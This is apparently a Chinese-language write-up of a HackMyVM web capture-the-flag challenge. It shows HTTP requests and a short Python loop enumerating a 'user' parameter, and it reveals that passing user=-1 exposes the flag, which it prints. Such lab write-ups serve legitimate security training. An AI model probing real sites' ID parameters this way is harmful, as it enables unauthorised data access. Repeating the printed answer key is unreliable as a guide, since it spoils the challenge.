Web - 042

备注

created by || sml

⏲️ Release Date // 2022-03-07

💀 Solvers // 68

🧩 Type // web

http://momo.hackmyvm.eu/n1lsfr4hm/

直接访问得到

┌─[randark@parrot]─[~]
└──╼ $http get http://momo.hackmyvm.eu/n1lsfr4hm/
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Fri, 02 Feb 2024 07:47:59 GMT
Server: nginx/1.18.0
Transfer-Encoding: chunked

<a href="/index.php?user=1">John</a>
<a href="/index.php?user=2">Monroe</a>
<a href="/index.php?user=3">Vault</a>
<a href="/index.php?user=4">{</a>
<a href="/index.php?user=6">Wesley</a>
<a href="/index.php?user=7">Teresa</a>
<a href="/index.php?user=8">Fredric</a>
<a href="/index.php?user=9">}</a>

使用脚本爬取各个页面的信息

import requests

url = "http://momo.hackmyvm.eu/n1lsfr4hm/index.php?user={}"

for i in range(1, 10):
    res = requests.get(url.format(i)).text
    print(res.split("\n")[-1].replace("<br>", ""))

得到

Hello Where Are Your o_O Super Easy Flag ?

想复杂了，传个 -1 即可

┌─[randark@parrot]─[~]
└──╼ $http get http://momo.hackmyvm.eu/n1lsfr4hm/index.php?user=-1
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Fri, 02 Feb 2024 08:08:27 GMT
Server: nginx/1.18.0
Transfer-Encoding: chunked

<a href="/index.php?user=1">John</a>
<a href="/index.php?user=2">Monroe</a>
<a href="/index.php?user=3">Vault</a>
<a href="/index.php?user=4">{</a>
<a href="/index.php?user=6">Wesley</a>
<a href="/index.php?user=7">Teresa</a>
<a href="/index.php?user=8">Fredric</a>
<a href="/index.php?user=9">}</a>
<br><br><br>HMV{fcknumbers}